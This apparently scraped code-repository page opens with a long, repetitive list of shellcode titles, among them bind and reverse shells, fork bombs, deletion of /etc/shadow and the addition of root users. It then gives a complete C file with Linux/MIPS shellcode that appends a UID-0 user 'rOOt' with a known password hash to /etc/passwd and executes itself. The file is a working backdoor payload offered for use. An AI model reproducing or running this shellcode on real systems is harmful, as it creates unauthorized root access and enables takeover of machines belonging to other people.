b51e0f27d5
52 new exploits Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) (38 bytes) Linux/x86 - unlink(/etc/passwd) & exit() (35 bytes) Linux i686 - pacman -S <package> (default package: backdoor) (64 bytes) Linux i686 - pacman -R <package> (59 bytes) Linux i686 - pacman -S <package> (default package: backdoor) (64 bytes) Linux i686 - pacman -R <package> (59 bytes) JITed stage-0 shellcode JITed exec notepad Shellcode Win32 - JITed stage-0 shellcode Win32 - JITed exec notepad Shellcode Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes) JITed egg-hunter stage-0 shellcode Win32/XP SP3 (RU) - WinExec+ExitProcess cmd shellcode (12 bytes) Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes) Windows - JITed egg-hunter stage-0 shellcode Win32/XP SP3 (RU) - WinExec+ExitProcess cmd shellcode (12 bytes) Linux/x86 - nc -lvve/bin/sh -p13377 shellcode Linux/x86 - polymorphic forkbombe - (30 bytes) Linux/x86 - forkbomb Linux/x86 - polymorphic forkbombe (30 bytes) Linux/x86 - forkbomb Linux/x86_64 - execve(_/bin/sh_); shellcode (30 bytes) Linux/x86 - sends _Phuck3d!_ to all terminals (60 bytes) Linux/x86_64 - execve(_/bin/sh_); shellcode (30 bytes) Linux/x86 - sends _Phuck3d!_ to all terminals (60 bytes) Linux/x86 - polymorphic execve(_/bin/bash___-p__NULL) (57 bytes) Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); (42 bytes) Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) (45 bytes) Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); (42 bytes) Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) (45 bytes) Linux/x86 - Disable randomize stack addresse (106 bytes) Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode 83 Linux/x86 - alphanumeric Bomb FORK Shellcode (117 bytes) Linux/x86 - Disable randomize stack addresse (106 bytes) Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode 83 Linux/x86 - alphanumeric Bomb FORK Shellcode (117 bytes) Linux/x86 - Shellcode Polymorphic - setuid(0) + chmod(_/etc/shadow__ 0666) Shellcode (61 bytes) Linux/x86 - kill all running process (11 bytes) Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) shellcode (45 bytes) Linux/x86 - sys_setuid(0) & sys_setgid(0) & execve (_/bin/sh_) shellcode (39 bytes) Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) shellcode (45 bytes) Linux/x86 - sys_setuid(0) & sys_setgid(0) & execve (_/bin/sh_) shellcode (39 bytes) Linux/x86 - unlink _/etc/shadow_ shellcode (33 bytes) Linux/x86 - hard / unclean reboot (29 bytes) Linux/x86 - hard / unclean reboot (33 bytes) Linux/x86 - unlink _/etc/shadow_ shellcode (33 bytes) Linux/x86 - hard / unclean reboot (29 bytes) Linux/x86 - hard / unclean reboot (33 bytes) Linux/x86 - chown root:root /bin/sh shellcode (48 bytes) Linux/x86 - give all user root access when execute /bin/sh (45 bytes) Linux/x86 - chown root:root /bin/sh shellcode (48 bytes) Linux/x86 - give all user root access when execute /bin/sh (45 bytes) Linux/ARM - setuid(0) & kill(-1_ SIGKILL) (28 bytes) Linux/ARM - execve(_/bin/sh___/bin/sh__0) (30 bytes) Linux/ARM - polymorphic chmod(_/etc/shadow__ 0777) (84 bytes) Linux/ARM - chmod(_/etc/shadow__ 0777) Shellcode (35 bytes) Linux/ARM - Disable ASLR Security (102 bytes) Linux/x86 - bind shell port 64533 (97 bytes) Safari JS JITed shellcode - exec calc (ASLR/DEP bypass) Windows - Safari JS JITed shellcode - exec calc (ASLR/DEP bypass) Win32 - Write-to-file Shellcode Linux/x86_64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) (49 bytes) Linux/x86 - netcat bindshell port 8080 (75 bytes) Shellcode Checksum Routine (18 bytes) Win32 - Shellcode Checksum Routine (18 bytes) Win32/XP SP3 (TR) - Add Admin Account Shellcode (127 bytes) Win32/XP Pro SP3 (EN) 32-bit - add new local administrator (113 bytes) Win32 - add new local administrator (326 bytes) Win32/XP Pro SP3 (EN) 32-bit - add new local administrator (113 bytes) Win32 - add new local administrator (326 bytes) Win32 - speaking shellcode Linux/x86 - netcat bindshell port 6666 (69 bytes) DNS Reverse Download and Exec Shellcode Windows - DNS Reverse Download and Exec Shellcode Linux/x86_32 - ConnectBack with SSL connection (422 bytes) Linux/x86 - ConnectBack with SSL connection (422 bytes) Linux/x86 - egghunt shellcode (29 bytes) Linux/MIPS - execve /bin/sh (48 bytes) Linux/MIPS - add user(UID 0) with password (164 bytes) Linux/MIPS - execve /bin/sh (48 bytes) Linux/MIPS - add user(UID 0) with password (164 bytes) Linux/x86 - execve(/bin/dash) (42 bytes) Linux/x86 - chmod (777 /etc/passwd & /etc/shadow)_ Add New Root User (ALI/ALI) & Execute /bin/sh (378 bytes) Linux/x86 - Obfuscated Shellcode chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash (521 bytes) Linux/x86 - rmdir (37 bytes) Linux/MIPS - execve (36 bytes) Windows XP x86-64 - Download & execute (Generator) Linux/x86 - /etc/passwd Reader (58 bytes) Linux - execve /bin/sh (23 bytes) Linux/x86 - execve /bin/sh (23 bytes) Linux/x86/x86_64 - reverse_tcp Shellcode Linux x86 & x86_64 - reverse_tcp Shellcode Linux/x86/x86_64 - tcp_bind Shellcode Linux/x86/x86_64 - Read etc/passwd Shellcode Linux x86 & x86_64 - tcp_bind Shellcode Linux x86 & x86_64 - Read etc/passwd Shellcode .Net Framework - Execute Native x86 Shellcode Win32 .Net Framework - Execute Native x86 Shellcode
71 lines
2.6 KiB
C
Executable file
71 lines
2.6 KiB
C
Executable file
/* Title: Linux/MIPS -add user(UID 0) with password - 164 bytes
|
|
* Date: 2011-11-24
|
|
* Author: rigan - imrigan [at] gmail.com
|
|
* Note:
|
|
* Username - rOOt
|
|
* Password - pwn3d
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
|
|
char sc[] =
|
|
"\x24\x09\x73\x50" // li t1,29520
|
|
"\x05\x30\xff\xff" // bltzal t1,400094 <L>
|
|
"\x24\x09\x73\x50" // li t1,29520 (nop)
|
|
|
|
/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND); */
|
|
"\x3c\x0f\x30\x2f" // lui t7,0x302f
|
|
"\x35\xef\x65\x74" // ori t7,t7,0x6574
|
|
"\x3c\x0e\x63\x2f" // lui t6,0x632f
|
|
"\x35\xce\x70\x61" // ori t6,t6,0x7061
|
|
"\x3c\x0d\x73\x73" // lui t5,0x7373
|
|
"\x35\xad\x77\x64" // ori t5,t5,0x7764
|
|
"\xaf\xaf\xff\xf3" // sw t7,-13(sp)
|
|
"\xaf\xae\xff\xf7" // sw t6,-9(sp)
|
|
"\xaf\xad\xff\xfb" // sw t5,-5(sp)
|
|
"\xaf\xa0\xff\xff" // sw zero,-1(sp)
|
|
"\x27\xa4\xff\xf4" // addiu a0,sp,-12
|
|
"\x24\x05\x01\x6d" // li a1,365
|
|
"\x24\x02\x0f\xa5" // li v0,4005
|
|
"\x01\x01\x01\x0c" // syscall 0x40404
|
|
|
|
"\xaf\xa2\xff\xfc" // sw v0,-4(sp)
|
|
|
|
/* write(fd, "rOOt:XJ1GV.nyFFMoI:0:0:root:/root:/bin/bash\n", 45); */
|
|
"\x8f\xa4\xff\xfc" // lw a0,-4(sp)
|
|
"\x23\xe5\x10\x0c" // addi a1,ra,4108
|
|
"\x20\xa5\xf0\x60" // addi a1,a1,-4000
|
|
"\x24\x09\xff\xd3" // li t1,-45
|
|
"\x01\x20\x30\x27" // nor a2,t1,zero
|
|
"\x24\x02\x0f\xa4" // li v0,4004
|
|
"\x01\x01\x01\x0c" // syscall 0x40404
|
|
|
|
/* close(fd); */
|
|
"\x24\x02\x0f\xa6" // li v0,4006
|
|
"\x01\x01\x01\x0c" // syscall 0x40404
|
|
|
|
/* exit(0); */
|
|
"\x28\x04\xff\xff" // slti a0,zero,-1
|
|
"\x24\x02\x0f\xa1" // li v0,4001
|
|
"\x01\x01\x01\x0c" // syscall 0x40404
|
|
|
|
/* "rOOt:XJ1GV.nyFFMoI:0:0:root:/root:/bin/bash\n" */
|
|
"\x72\x4f\x4f\x74"
|
|
"\x3a\x58\x4a\x31"
|
|
"\x47\x56\x2e\x6e"
|
|
"\x79\x46\x46\x4d"
|
|
"\x6f\x49\x3a\x30"
|
|
"\x3a\x30\x3a\x72"
|
|
"\x6f\x6f\x74\x3a"
|
|
"\x2f\x72\x6f\x6f"
|
|
"\x74\x3a\x2f\x62"
|
|
"\x69\x6e\x2f\x62"
|
|
"\x61\x73\x68\x0a";
|
|
|
|
void main(void)
|
|
{
|
|
void(*s)(void);
|
|
printf("size: %d\n", strlen(sc));
|
|
s = sc;
|
|
s();
|
|
}
|